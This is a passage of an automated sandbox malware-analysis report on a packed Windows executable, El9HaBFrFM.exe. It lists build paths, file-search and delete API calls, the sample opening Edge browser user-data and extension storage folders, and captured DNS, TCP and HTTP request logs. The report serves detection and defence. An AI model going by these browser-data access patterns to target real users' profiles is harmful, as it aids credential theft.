              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2256002845.00007FFDFAFCA000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000053.00000002.2145961692.00007FF6D7F40000.00000002.00000001.01000000.00000022.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: El9HaBFrFM.exe, 00000001.00000002.2261083464.00007FFE13201000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: El9HaBFrFM.exe, 00000001.00000002.2261488219.00007FFE13301000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2259608599.00007FFE11501000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: El9HaBFrFM.exe
              Source: Binary string: E:\trksyln\Coding\trksyln.net\repos\TGMacro\obj\Debug\TGMacro.pdb source: El9HaBFrFM.exe, 00000001.00000003.1710912781.0000025069359000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: El9HaBFrFM.exe, 00000001.00000002.2261272243.00007FFE1322B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260891660.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: El9HaBFrFM.exe, 00000001.00000002.2261272243.00007FFE1322B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260707482.00007FFE11ED1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260219620.00007FFE11561000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260486128.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: El9HaBFrFM.exe, 00000001.00000002.2258031629.00007FFDFB648000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2259888394.00007FFE1152E000.00000040.00000001.01000000.0000000E.sdmp
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3A83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6BA3A83C0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3A9280 FindFirstFileExW,FindClose,0_2_00007FF6BA3A9280
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3C1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6BA3C1874
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3A9280 FindFirstFileExW,FindClose,1_2_00007FF6BA3A9280
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3A83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6BA3A83C0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 1_2_00007FF6BA3C1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6BA3C1874
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EF46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,83_2_00007FF6D7EF46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7EEE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,83_2_00007FF6D7EEE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F388E0 FindFirstFileExA,83_2_00007FF6D7F388E0
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\Jump to behavior

              Networking

              barindex
              Source: C:\Windows\System32\svchost.exeDomain query: code.jquery.com
              Source: unknownNetwork traffic detected: DNS query count 39
              Source: global trafficTCP traffic: 192.168.2.4:51189 -> 1.1.1.1:53
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 104.18.38.233
              Source: unknownTCP traffic detected without corresponding DNS query: 152.199.19.74
              Source: unknownTCP traffic detected without corresponding DNS query: 152.199.19.74
              Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
              Source: unknownTCP traffic detected without corresponding DNS query: 104.18.38.233
              Source: unknownTCP traffic detected without corresponding DNS query: 152.199.19.74
              Source: unknownTCP traffic detected without corresponding DNS query: 152.199.19.74
              Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
              Source: global trafficHTTP traffic detected: GET /tgmacro/download HTTP/1.1Host: trksyln.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /Error HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://trksyln.net/tgmacro/downloadAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trksyln.net/tgmacro/downloadAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://trksyln.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.0.2/dist/css/bootstrap.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://trksyln.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /resources/css/site.css HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://trksyln.net/ErrorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /resources/css/navbar.css HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://trksyln.net/ErrorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /resources/js/navbar.js HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/ErrorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /td/ga/rul?tid=G-JH2MNQ1WXY&gacid=1627253267.1730398763&gtm=45je4au0v9106823843za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533422~101823848~101878899~101878944~101925629&z=1195082281 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /resources/css/projectCard.css HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://trksyln.net/ErrorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
              Source: global trafficHTTP traffic detected: GET /resources/img/logo.png HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trksyln.net/ErrorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
              Source: global trafficHTTP traffic detected: GET /resources/img/error.png HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trksyln.net/ErrorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
              Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://trksyln.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /npm/bootstrap-affix@1.0.1/assets/js/affix.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/7/7d/Microsoft_.NET_logo.svg/1200px-Microsoft_.NET_logo.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /i/pub-9495854422341365?ers=1 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /npm/bootstrap-affix@1.0.1/assets/js/affix.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /f/AGSKWxV0ZPylImy9Jv559Xp-MfnxImaXclZ9OIKioUncC-GjReRDOsqaZURJYln7HbKIHyw60n2CPZC7wftExCVvpG55gIUpCQASPLV6D5xkeZKDyuznFxUsEyU7ddDqW8yK_JFWTVcJHA==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzY3LDE4MTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzddXSwiaHR0cHM6Ly90cmtzeWxuLm5ldC9FcnJvciIsbnVsbCxbWzgsIllzZ09PY3R1a3JJIl0sWzksImVuLVVTIl0sWzE5LCIyIl0sWzE3LCJbMF0iXV1d HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /resources/img/logo.png HTTP/1.1Host: trksyln.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
              Source: global trafficHTTP traffic detected: GET /resources/img/error.png HTTP/1.1Host: trksyln.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
              Source: global trafficHTTP traffic detected: GET /i/pub-9495854422341365?ers=1 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/7/7d/Microsoft_.NET_logo.svg/1200px-Microsoft_.NET_logo.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /f/AGSKWxUGL8xOsRaRP5PFyweqWIg8FLUl9Kj6bzVgUHc3lpUPZXC03phBxzVHNadhsFw6_SzGM2DcFUpr-aQhK_YmXtMeNnbqjjF6RvqMXAXnOY2uUuOqYG08zgv8dhrK8dARDb02qTW72dksb9BfH6gYBeExaqhirVZfYVfltGg-pJlYyh4-ZwVEQ-1y8o4E/_/googlempu.-scrollads.-banner-ad.=display_ad&_ads_iframe_ HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /f/AGSKWxV0ZPylImy9Jv559Xp-MfnxImaXclZ9OIKioUncC-GjReRDOsqaZURJYln7HbKIHyw60n2CPZC7wftExCVvpG55gIUpCQASPLV6D5xkeZKDyuznFxUsEyU7ddDqW8yK_JFWTVcJHA==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzY3LDE4MTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzddXSwiaHR0cHM6Ly90cmtzeWxuLm5ldC9FcnJvciIsbnVsbCxbWzgsIllzZ09PY3R1a3JJIl0sWzksImVuLVVTIl0sWzE5LCIyIl0sWzE3LCJbMF0iXV1d HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
